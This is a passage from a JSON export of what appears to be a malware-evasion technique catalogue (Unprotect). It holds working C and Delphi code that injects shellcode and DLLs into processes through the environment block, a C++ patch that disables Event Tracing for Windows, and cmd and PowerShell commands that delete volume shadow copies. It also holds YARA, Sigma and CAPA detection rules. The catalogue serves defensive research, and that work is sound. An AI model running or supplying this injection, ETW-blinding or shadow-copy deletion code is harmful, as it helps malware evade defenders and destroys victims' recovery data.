(void*)(pRemotePtr_RtlUserProcessParameters + 0x48), (void*)&pRemotePtr_EnvironmentStr, sizeof(BYTE*), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read EnvironmentStr value from RtlUserProcessParameters\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// update environment string ptr to ignore the original bytes\r\n\tpRemotePtr_EnvironmentStr += dwOrigEnvBlockTotalLengthBytes;\r\n\r\n\t// read EnvironmentStr value\r\n\tmemset(bLoaderCode_Copy, 0, sizeof(bLoaderCode_Copy));\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)pRemotePtr_EnvironmentStr, (void*)bLoaderCode_Copy, sizeof(bGlobal_LoaderCode), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read loader data from EnvironmentStr\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// ensure the loader code has been copied correctly\r\n\tif(memcmp(bLoaderCode_Copy, bGlobal_LoaderCode, sizeof(bGlobal_LoaderCode)) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Invalid loader data\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Executing code in remote process...\\n\");\r\n\r\n\t// temporarily make the loader code executable\r\n\tif(VirtualProtectEx(ProcessInfo.hProcess, pRemotePtr_EnvironmentStr, sizeof(bGlobal_LoaderCode), PAGE_EXECUTE_READWRITE, &dwOriginalProtect) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to update memory protection\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// execute payload\r\n\tif(NtCreateThreadEx(&hThread, 0x001FFFFF, NULL, ProcessInfo.hProcess, (BYTE*)(pRemotePtr_EnvironmentStr + LOADER_CODE_OFFSET), (LPVOID)0, 0, NULL, 0, 0, NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to create code loader thread in remote process\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\tCloseHandle(hThread);\r\n\r\n\t// restore original protection value\r\n\tif(VirtualProtectEx(ProcessInfo.hProcess, pRemotePtr_EnvironmentStr, sizeof(bGlobal_LoaderCode), dwOriginalProtect, &dwTempProtect) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to update memory protection\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// resume main thread\r\n\tResumeThread(ProcessInfo.hThread);\r\n\r\n\t// close handles\r\n\tCloseHandle(ProcessInfo.hThread);\r\n\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tchar *pExePath = NULL;\r\n\r\n\tBYTE bPayload[] =\r\n\t{\r\n\t\t// string: <user32.dll>\r\n\t\t// push 0x00006C6C\r\n\t\t0x68, 0x6C, 0x6C, 0x00, 0x00,\r\n\t\t// push 0x642E3233\r\n\t\t0x68, 0x33, 0x32, 0x2E, 0x64,\r\n\t\t// push 0x72657375\r\n\t\t0x68, 0x75, 0x73, 0x65, 0x72,\r\n\t\t// mov ecx, esp\r\n\t\t0x8B, 0xCC,\r\n\t\t// push ecx (ModuleName)\r\n\t\t0x51,\r\n\t\t// mov eax, LoadLibraryA\r\n\t\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t\t// call eax\r\n\t\t0xFF, 0xD0,\r\n\r\n\t\t // string: <Code injected successfully!>\r\n\t\t// push 0x0021796C\r\n\t\t0x68, 0x6C, 0x79, 0x21, 0x00,\r\n\t\t// push 0x6C756673\r\n\t\t0x68, 0x73, 0x66, 0x75, 0x6C,\r\n\t\t// push 0x73656363\r\n\t\t0x68, 0x63, 0x63, 0x65, 0x73,\r\n\t\t// push 0x75732064\r\n\t\t0x68, 0x64, 0x20, 0x73, 0x75,\r\n\t\t// push 0x65746365\r\n\t\t0x68, 0x65, 0x63, 0x74, 0x65,\r\n\t\t// push 0x6A6E6920\r\n\t\t0x68, 0x20, 0x69, 0x6E, 0x6A,\r\n\t\t// push 0x65646F43\r\n\t\t0x68, 0x43, 0x6F, 0x64, 0x65,\r\n\t\t// mov ecx, esp\r\n\t\t0x8B, 0xCC,\r\n\t\t// string: <www.x86matthew.com>\r\n\t\t// push 0x00006D6F\r\n\t\t0x68, 0x6F, 0x6D, 0x00, 0x00,\r\n\t\t// push 0x632E7765\r\n\t\t0x68, 0x65, 0x77, 0x2E, 0x63,\r\n\t\t// push 0x68747461\r\n\t\t0x68, 0x61, 0x74, 0x74, 0x68,\r\n\t\t// push 0x6D363878\r\n\t\t0x68, 0x78, 0x38, 0x36, 0x6D,\r\n\t\t// push 0x2E777777\r\n\t\t0x68, 0x77, 0x77, 0x77, 0x2E,\r\n\t\t// mov ebx, esp\r\n\t\t0x8B, 0xDC,\r\n\t\t// push MB_OK\r\n\t\t0x6A, 0x00,\r\n\t\t// push ebx (Caption)\r\n\t\t0x53,\r\n\t\t// push ecx (Text)\r\n\t\t0x51,\r\n\t\t// push hWnd\r\n\t\t0x6A, 0x00,\r\n\t\t// mov eax, MessageBoxA\r\n\t\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t\t// call eax\r\n\t\t0xFF, 0xD0,\r\n\r\n\t\t// add esp, 0x3C\r\n\t\t0x83, 0xC4, 0x3C,\r\n\r\n\t\t// ret\r\n\t\t0xC3\r\n\t};\r\n\r\n\t// set function addresses\r\n\t*(DWORD*)&bPayload[19] = (DWORD)LoadLibraryA;\r\n\t*(DWORD*)&bPayload[96] = (DWORD)MessageBoxA;\r\n\r\n\tprintf(\"ProcEnvInjection - www.x86matthew.com\\n\\n\");\r\n\r\n\t// check params\r\n\tif(argc != 2)\r\n\t{\r\n\t\tprintf(\"Usage: %s [exe_path]\\n\\n\", argv[0]);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// get cmd param\r\n\tpExePath = argv[1];\r\n\t\r\n\t// get NtQueryInformationProcess function\r\n\tNtQueryInformationProcess = (unsigned long (__stdcall *)(void *,unsigned long,void *,unsigned long,unsigned long *))GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryInformationProcess\");\r\n\tif(NtQueryInformationProcess == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// get NtCreateThreadEx function\r\n\tNtCreateThreadEx = (unsigned long (__stdcall *)(void ** ,unsigned long,void *,void *,void *,void *,unsigned long,unsigned long *,unsigned long,unsigned long,void *))GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtCreateThreadEx\");\r\n\tif(NtCreateThreadEx == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// start target process\r\n\tif(StartInjectedProcess(pExePath, bPayload, sizeof(bPayload)) != 0)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Injected successfully\\n\");\r\n\r\n\treturn 0;\r\n}"
                },
                {
                    "id": 80,
                    "language": {
                        "id": 1,
                        "label": "Delphi",
                        "code_class": "Delphi"
                    },
                    "author": {
                        "id": 1,
                        "name": "Jean-Pierre LESUEUR",
                        "email": "jplesueur@phrozen.io",
                        "linkedin": "https://www.linkedin.com/in/jlesueur/",
                        "twitter": "https://www.twitter.com/darkcodersc",
                        "website": "https://www.phrozen.io/",
                        "github": "https://github.com/DarkCoderSc"
                    },
                    "technique": "https://unprotect.it/api/techniques/178/",
                    "description": "This code snippet demonstrate how to Inject a DLL in a remote process without using `WriteProcessMemory` and `VirtualAlloc(Ex)`.",
                    "plain_code": "(*\r\n    Example of DLL Code to test DLL Injection:\r\n    ------------------------------------------\r\n\r\n    BOF>>\r\n\r\n    library UnprotectTestDLL;\r\n\r\n          uses\r\n            WinApi.Windows,\r\n            System.SysUtils,\r\n            System.Classes;\r\n\r\n          {$R *.res}\r\n\r\n          procedure DllMain(AReason: Integer);\r\n          var AMessage   : String;\r\n              AStrReason : String;\r\n          begin\r\n            case AReason of\r\n              DLL_PROCESS_DETACH : AStrReason := 'DLL_PROCESS_DETACH';\r\n              DLL_PROCESS_ATTACH : AStrReason := 'DLL_PROCESS_ATTACH';\r\n              DLL_THREAD_ATTACH  : AStrReason := 'DLL_THREAD_ATTACH';\r\n              DLL_THREAD_DETACH  : AStrReason := 'DLL_THREAD_DETACH';\r\n              else\r\n                AStrReason := 'REASON_UNKNOWN';\r\n            end;\r\n\r\n            AMessage := Format('(%s): Injected! Living in %d (%s) process.', [\r\n              AStrReason,\r\n              GetCurrentProcessId(),\r\n              ExtractFileName(GetModuleName(0))\r\n            ]);\r\n            ///\r\n\r\n            OutputDebugStringW(PWideChar(AMessage));\r\n          end;\r\n\r\n          begin\r\n            DllProc := DllMain;\r\n            DllMain(DLL_PROCESS_ATTACH)\r\n\r\n\r\n    <<EOF\r\n*)\r\n\r\n// Support both x86-32 and x86-64\r\n\r\nprogram ProcEnvInjection_DLLInjection;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n  Winapi.Windows,\r\n  System.Math,\r\n  System.SysUtils;\r\n\r\ntype\r\n  EWindowsException = class(Exception)\r\n  private\r\n    FLastError : Integer;\r\n  public\r\n    {@C}\r\n    constructor Create(const WinAPI : String); overload;\r\n\r\n    {@G}\r\n    property LastError : Integer read FLastError;\r\n  end;\r\n\r\n  {$IFDEF WIN64}\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : Int64;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : Int64;\r\n    BasePriority       : Int64;\r\n    UniqueProcessId    : Int64;\r\n    InheritedUniquePID : Int64;\r\n    end;\r\n  {$ELSE}\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : DWORD;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : DWORD;\r\n    BasePriority       : DWORD;\r\n    UniqueProcessId    : DWORD;\r\n    InheritedUniquePID : DWORD;\r\n    end;\r\n  {$ENDIF}\r\n\r\n  UNICODE_STRING = record\r\n    Length        : Word;\r\n    MaximumLength : Word;\r\n    Buffer        : LPWSTR;\r\n  end;\r\n\r\n  CURDIR = record\r\n    DosPath : UNICODE_STRING;\r\n    Handle  : THandle;\r\n  end;\r\n\r\n  RTL_DRIVE_LETTER_CURDIR = record\r\n    Flags     : Word;\r\n    Length    : Word;\r\n    TimeStamp : ULONG;\r\n    DosPath   : UNICODE_STRING;\r\n  end;\r\n\r\n  TRTLUserProcessParameters = record\r\n    MaximumLength      : ULONG;\r\n    Length             : ULONG;\r\n    Flags              : ULONG;\r\n    DebugFlags         : ULONG;\r\n    ConsoleHandle      : THANDLE;\r\n    ConsoleFlags       : ULONG;\r\n    StandardInput      : THANDLE;\r\n    StandardOutput     : THANDLE;\r\n    StandardError      : THANDLE;\r\n    CurrentDirectory   : CURDIR;\r\n    DllPath            : UNICODE_STRING;\r\n    ImagePathName      : UNICODE_STRING;\r\n    CommandLine        : UNICODE_STRING;\r\n    Environment        : Pointer;\r\n    StartingX          : ULONG;\r\n    StartingY          : ULONG;\r\n    CountX             : ULONG;\r\n    CountY             : ULONG;\r\n    CountCharsX        : ULONG;\r\n    CountCharsY        : ULONG;\r\n    FillAttribute      : ULONG;\r\n    WindowFlags        : ULONG;\r\n    ShowWindowFlags    : ULONG;\r\n    WindowTitle        : UNICODE_STRING;\r\n    DesktopInfo        : UNICODE_STRING;\r\n    ShellInfo          : UNICODE_STRING;\r\n    RuntimeData        : UNICODE_STRING;\r\n    CurrentDirectories : array [0 .. 32-1] of RTL_DRIVE_LETTER_CURDIR;\r\n  end;\r\n  PRTLUserProcessParameters = ^TRTLUserProcessParameters;\r\n\r\n  TPEB = record\r\n    Reserved1              : array [0..2-1] of Byte;\r\n    BeingDebugged          : Byte;\r\n    Reserved2              : Byte;\r\n    Reserved3              : array [0..2-1] of Pointer;\r\n    Ldr                    : Pointer;\r\n    ProcessParameters      : PRTLUserProcessParameters;\r\n    Reserved4              : array [0..103-1] of Byte;\r\n    Reserved5              : array [0..52-1] of Pointer;\r\n    PostProcessInitRoutine : Pointer;\r\n    Reserved6              : array [0..128-1] of byte;\r\n    Reserved7              : Pointer;\r\n    SessionId              : ULONG;\r\n  end;\r\n  PPEB = ^TPEB;\r\n\r\nfunction NtQueryInformationProcess(\r\n  ProcessHandle : THandle;\r\n  ProcessInformationClass : DWORD;\r\n  ProcessInformation : Pointer;\r\n  ProcessInformationLength : ULONG;\r\n  ReturnLength : PULONG\r\n): LongInt; stdcall; external 'ntdll.dll';\r\n\r\nconst PROCESS_BASIC_INFORMATION = 0;\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n  FLastError := GetLastError();\r\n\r\n  AFormatedMessage := Format('___%s: last_err=%d, last_err_msg=\"%s\".', [\r\n      WinAPI,\r\n      FLastError,\r\n      SysErrorMessage(FLastError)\r\n  ]);\r\n\r\n  ///\r\n  inherited Create(AFormatedMessage);\r\nend;\r\n\r\nfunction RandomString(ALength : Word) : String;\r\nconst AChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';\r\nvar I : Integer;\r\nbegin\r\n  result := '';\r\n  ///\r\n\r\n  randomize;\r\n\r\n  for I := 1 to ALength do begin\r\n      result := result + AChars[random(length(AChars))+1];\r\n  end;\r\nend;\r\n\r\n\r\nfunction InjectDLL(const ADLLPath : String; AHostApplication: String; const AEggLength : Cardinal = 5) : Boolean;\r\nvar AStartupInfo              : TStartupInfo;\r\n    AProcessInfo              : TProcessInformation;\r\n    AEnvLen                   : Cardinal;\r\n    pEnvBlock                 : Pointer;\r\n    ARetLen                   : Cardinal;\r\n    PBI                       : TProcessBasicInformation;\r\n    APEB                      : TPEB;\r\n    ABytesRead                : SIZE_T;\r\n    ARTLUserProcessParameters : TRTLUserProcessParameters;\r\n    i                         : Integer;\r\n    pOffset                   : Pointer;\r\n    APayloadEgg               : String;\r\n    APayloadEnv               : String;\r\n    ABuffer                   : array of byte;\r\n    pPayloadOffset            : Pointer;\r\n    AThreadId                 : Cardinal;\r\nbegin\r\n  ZeroMemory(@AStartupInfo, SizeOf(TStartupInfo));\r\n  AStartupInfo.cb := SizeOf(TStartupInfo);\r\n\r\n  ZeroMemory(@AProcessInfo, SizeOf(TProcessInformation));\r\n\r\n  result := False;\r\n\r\n  APayloadEgg := RandomString(AEggLength);\r\n  APayloadEnv := Format('%s=%s', [APayloadEgg, ADLLPath]);\r\n\r\n  AEnvLen := (Length(APayloadEnv) * SizeOf(WideChar));\r\n\r\n  GetMem(pEnvBlock, AEnvLen);\r\n  try\r\n    ZeroMemory(pEnvBlock, AEnvLen);\r\n    Move(PWideChar(APayloadEnv)^, pEnvBlock^, AEnvLen);\r\n    ///\r\n\r\n    UniqueString(AHostApplication);\r\n\r\n    if not CreateProcessW(\r\n        PWideChar(AHostApplication),\r\n        nil,\r\n        nil,\r\n        nil,\r\n        False,\r\n        CREATE_NEW_CONSOLE or CREATE_UNICODE_ENVIRONMENT,\r\n        pEnvBlock,\r\n        nil,\r\n        AStartupInfo,\r\n        AProcessInfo\r\n    ) then\r\n      raise EWindowsException.Create('CreateProcessW');\r\n\r\n    // Tiny trick to be sure new process is completely initailized.\r\n    // Remove bellow if you find it problematic.\r\n    WaitForInputIdle(AProcessInfo.hProcess, INFINITE);\r\n\r\n    if NtQueryInformationProcess(\r\n        AProcessInfo.hProcess,\r\n        PROCESS_BASIC_INFORMATION,\r\n        @PBI,\r\n        SizeOf(TProcessBasicInformation),\r\n        @ARetLen\r\n    ) <> ERROR_SUCCESS then\r\n      raise EWindowsException.Create('NtQueryInformationProcess');\r\n\r\n    if not ReadProcessMemory(\r\n        AProcessInfo.hProcess,\r\n        PBI.PebBaseAddress,\r\n        @APEB,\r\n        SizeOf(TPEB),\r\n        ABytesRead\r\n    ) then\r\n      raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n    if not ReadProcessMemory(\r\n        AProcessInfo.hProcess,\r\n        APEB.ProcessParameters,\r\n        @ARTLUserProcessParameters,\r\n        SizeOf(TRTLUserProcessParameters),\r\n        ABytesRead\r\n    ) then\r\n      raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n    // Scan Environment Variable Memory Block\r\n    I := 0;\r\n\r\n    SetLength(ABuffer, AEggLength * SizeOf(WideChar));\r\n\r\n    pPayloadOffset := nil;\r\n\r\n    while true do begin\r\n      pOffset := Pointer(NativeUInt(ARTLUserProcessParameters.Environment) + I);\r\n      ///\r\n\r\n      if not ReadProcessMemory(\r\n          AProcessInfo.hProcess,\r\n          pOffset,\r\n          @ABuffer[0],\r\n          Length(ABuffer),\r\n          ABytesRead\r\n      ) then\r\n        raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n      if CompareMem(PWideChar(ABuffer), PWideChar(APayloadEgg), Length(ABuffer)) then begin\r\n        pPayloadOffset := Pointer(NativeUInt(pOffset) + Length(ABuffer) + SizeOf(WideChar) { =\\0 });\r\n\r\n        break;\r\n      end;\r\n\r\n      Inc(I, 2);\r\n    end;\r\n\r\n    SetLength(ABuffer, 0);\r\n\r\n    if not Assigned(pPayloadOffset) then\r\n      raise Exception.Create('Could not locate Injected DLL Path offset from remote process environment.');\r\n\r\n    // Debug, read DLL path from remote process\r\n//    SetLength(ABuffer, AEnvLen - (5 * SizeOf(WideChar)));\r\n//    ReadProcessMemory(\r\n//        AProcessInfo.hProcess,\r\n//        pPayloadOffset,\r\n//        @ABuffer[0],\r\n//        Length(ABuffer),\r\n//        ABytesRead\r\n//    );\r\n//    WriteLn(PWideChar(ABuffer));\r\n\r\n    // Start DLL Injection\r\n    if CreateRemoteThread(\r\n        AProcessInfo.hProcess,\r\n        nil,\r\n        0,\r\n        GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryW'),\r\n        pPayloadOffset,\r\n        0,\r\n        AThreadId\r\n    ) = 0 then\r\n      raise EWindowsException.Create('CreateRemoteThread');\r\n  finally\r\n    FreeMem(pEnvBlock, AEnvLen);\r\n  end;\r\nend;\r\n\r\nbegin\r\n  try\r\n    InjectDLL('C:\\Temp\\UnprotectTestDLL.dll', 'C:\\Program Files\\Notepad++\\notepad++.exe');\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
                }
            ],
            "detection_rules": []
        },
        {
            "id": 177,
            "unprotect_id": "U0306",
            "name": "Disabling Event Tracing for Windows (ETW)",
            "categories": [
                {
                    "id": 8,
                    "key": "anti-forensic",
                    "label": "Anti-Forensic"
                }
            ],
            "description": "Many EDR solutions leverage Event Tracing for Windows (ETW) extensively. ETW allows for extensive instrumentation and tracing of a process functionality and WINAPI calls. It has components in the kernel, to register callbacks for system calls and other kernel operations, but also consists of a userland component that is part of ntdll.dll. \r\n\r\nSince ntdll.dll is a DLL loaded into the process of a binary, an attacker can have full control over this DLL and therefore the ETW functionality. The most common nypassing technique is patching the function EtwEventWrite which is called to write/log ETW events. It is possible to fetch its address in ntdll.dll, and replace its first instructions with instructions to return 0 (SUCCESS).",
            "resources": "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/",
            "tags": "anti-forensic",
            "snippets": [
                {
                    "id": 73,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/177/",
                    "description": "Snippet source code from @_vivami",
                    "plain_code": "void disableETW(void) {\r\n\t// return 0\r\n\tunsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3};     // xor rax, rax; ret\r\n\t\r\n\tULONG oldprotect = 0;\r\n\tsize_t size = sizeof(patch);\r\n\t\r\n\tHANDLE hCurrentProc = GetCurrentProcess();\r\n\t\r\n\tunsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };\r\n\t\r\n\tvoid *pEventWrite = GetProcAddress(GetModuleHandle((LPCSTR) sNtdll), (LPCSTR) sEtwEventWrite);\r\n\t\r\n\tNtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, PAGE_READWRITE, &oldprotect);\r\n\t\r\n\tmemcpy(pEventWrite, patch, size / sizeof(patch[0]));\r\n\t\r\n\tNtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, oldprotect, &oldprotect);\r\n\tFlushInstructionCache(hCurrentProc, pEventWrite, size);\r\n\t\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 176,
            "unprotect_id": "U1008",
            "name": "Anti-UPX Unpacking",
            "categories": [
                {
                    "id": 14,
                    "key": "others",
                    "label": "Others"
                }
            ],
            "description": "Anti-UPX Unpacking is the technique to prevent malware from being unpacked by tools like UPX. UPX packed binary indicates that the section names starting with UPX followed by a number (UPX0 and UPX1) and the string “UPX!” at the end of the PE header. This UPX reference structure is located at the end of the PE header and the header includes checksums, packed and unpacked sizes, and compression details.\r\n\r\nThere are some methods to bypass unpacking using \"upx -d\" since a long time ago.\r\n\r\nOne easy way is to change section names to different strings, this is the example. The normal section names packed by UPX are \"UPX0\", \"UPX1\" .. and \".rsrc\". The unpacking command \"upx -d\" raises this kind of exception of \"CantUnpackException: file is possibly modified/hacked/protected; take care!\" in this case and results in preventing from unpacking.\r\n\r\nAnother method is zero-padding against any size or checksum infos in UPX reference structure. The \"upx -d\" raises this kind of exception of \"CantUnpackException: header corrupted\" at this time and results in preventing from unpacking.",
            "resources": "https://github.com/upx/upx/blob/master/src/stub/src/include/header.S\r\nhttps://bsodtutorials.wordpress.com/2014/11/14/upx-packing-and-anti-packing-techniques/\r\nhttps://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html\r\nhttps://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/\r\nhttps://www.akamai.com/blog/security/upx-packed-headaches",
            "tags": "antiUPX",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 50,
                    "key": "yara_packer_antiunpack",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_PACKER_antiunpack",
                    "rule": "rule upx_antiunpack_pe {\r\n     meta:\r\n        description = \"Anti-UPX Unpacking technique about section renaming and zero padding against upx reference structure\"\r\n        author = \"hackeT\"\r\n\r\n    strings:\r\n        $mz = \"MZ\"\r\n\r\n        $upx0 = {55 50 58 30 00 00 00}  //section name UPX0\r\n        $upx1 = {55 50 58 31 00 00 00}  //section name UPX1\r\n        $upx_sig = \"UPX!\"               //UPX_MAGIC_LE32\r\n        $upx_sig2 = {A1 D8 D0 D5}       //UPX_MAGIC2_LE32\r\n        $zero = {00 00 00 00}\r\n\r\n    condition:\r\n        $mz at 0 and ( $upx_sig at 992 or $upx_sig2 at 992 )\r\n        and \r\n        ( \r\n          not ($upx0 in (248..984) or $upx1 in (248..984)) // section renaming: 248 is the minimum offset after pe optional header.\r\n        or \r\n          $zero in (992..1024)                             // zero padding against upx reference structure: pe header ends offset 1024.\r\n        )\r\n}"
                }
            ]
        },
        {
            "id": 175,
            "unprotect_id": "U0305,T1070.004",
            "name": "Volume Shadow Copy Service (VSC,VSS) Deletion",
            "categories": [
                {
                    "id": 8,
                    "key": "anti-forensic",
                    "label": "Anti-Forensic"
                },
                {
                    "id": 10,
                    "key": "Defense-Evasion-Mitre",
                    "label": "Defense Evasion [Mitre]"
                }
            ],
            "description": "Deleting Volume Shadow Copy makes the forensic investigation more difficult in terms of the recovery of previous artifact evidence. In addition, attackers using ransomware often delete VSCs not to be able to recover the original files of the encrypted files from VSCs. \r\n\r\nOn the other hand, deleting by using vssadmin and WMIC is on a file system level, the actual data remains in clusters. Thus, it may be able to be recovered from VSC until other files overwrite the clusters.",
            "resources": "https://docs.microsoft.com/ja-jp/windows-server/administration/windows-commands/vssadmin-delete-shadows\r\nhttps://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\nhttps://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware\r\nhttps://blog.avast.com/zepto-ransomware-now-introduces-new-features-to-better-encrypt-your-files\r\nhttp://www.kazamiya.net/DeletedSC\r\nhttps://github.com/mnrkbys/vss_carver\r\nhttps://www.shadowexplorer.com/",
            "tags": "VSC,ShadowCopy,Ransomware",
            "snippets": [
                {
                    "id": 71,
                    "language": {
                        "id": 7,
                        "label": "cmd",
                        "code_class": "cmd"
                    },
                    "author": {
                        "id": 15,
                        "name": "hackeT",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/tatsuya-hasegawa-aa3279142/",
                        "twitter": "https://twitter.com/T_8ase",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/175/",
                    "description": "",
                    "plain_code": "vssadmin.exe delete shadows /all /quiet\r\nwmic shadowcopy delete /nointeractive\r\nvssadmin resize shadowstorage /for= /on= /maxsize="
                },
                {
                    "id": 72,
                    "language": {
                        "id": 8,
                        "label": "PowerShell",
                        "code_class": "PowerShell"
                    },
                    "author": {
                        "id": 15,
                        "name": "hackeT",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/tatsuya-hasegawa-aa3279142/",
                        "twitter": "https://twitter.com/T_8ase",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/175/",
                    "description": "",
                    "plain_code": "Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }\r\nGet-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }\r\nGet-WmiObject Win32_ShadowCopy | Remove-WmiObject"
                }
            ],
            "detection_rules": [
                {
                    "id": 33,
                    "key": "sigma_delete_shadow_copy",
                    "type": {
                        "id": 3,
                        "name": "SIGMA",
                        "syntax_lang": "yaml"
                    },
                    "name": "SIGMA_delete_shadow_copy",
                    "rule": "title: Delete Shadow Copy Via Powershell\r\nstatus: experimental\r\ndescription: Delete Shadow Copy Via Powershell\r\nauthor: Joe Security\r\ndate: 2019-10-25\r\nid: 200011\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack: T1490\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==*'\r\n      condition: selection\r\nlevel: critical"
                },
                {
                    "id": 56,
                    "key": "capa_delete_volume_shadow_copy",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Delete_Volume_Shadow_Copy",
                    "rule": "rule:\r\n  meta:\r\n    name: delete volume shadow copies\r\n    namespace: impact/inhibit-system-recovery\r\n    author: moritz.raabe@mandiant.com\r\n    scope: function\r\n    att&ck:\r\n      - Impact::Inhibit System Recovery [T1490]\r\n      - Defense Evasion::Indicator Removal on Host::File Deletion [T1070.004]\r\n    mbc:\r\n      - Impact::Data Destruction::Delete Shadow Copies [E1485.m04]\r\n    examples:\r\n      - B87E9DD18A5533A09D3E48A7A1EFBCF6:0x140006AF0\r\n  features:\r\n    - or:\r\n      - string: /vssadmin.* delete shadows/i\r\n      - string: /vssadmin.* resize shadowstorage/i\r\n      - string: /wmic.* shadowcopy delete/i"
                },
                {
                    "id": 34,
                    "key": "sigma_posh_pc_delete_volume_shadow_copies",
                    "type": {
                        "id": 3,
                        "name": "SIGMA",
                        "syntax_lang": "yaml"
                    },
                    "name": "SIGMA_posh_pc_delete_volume_shadow_copies",
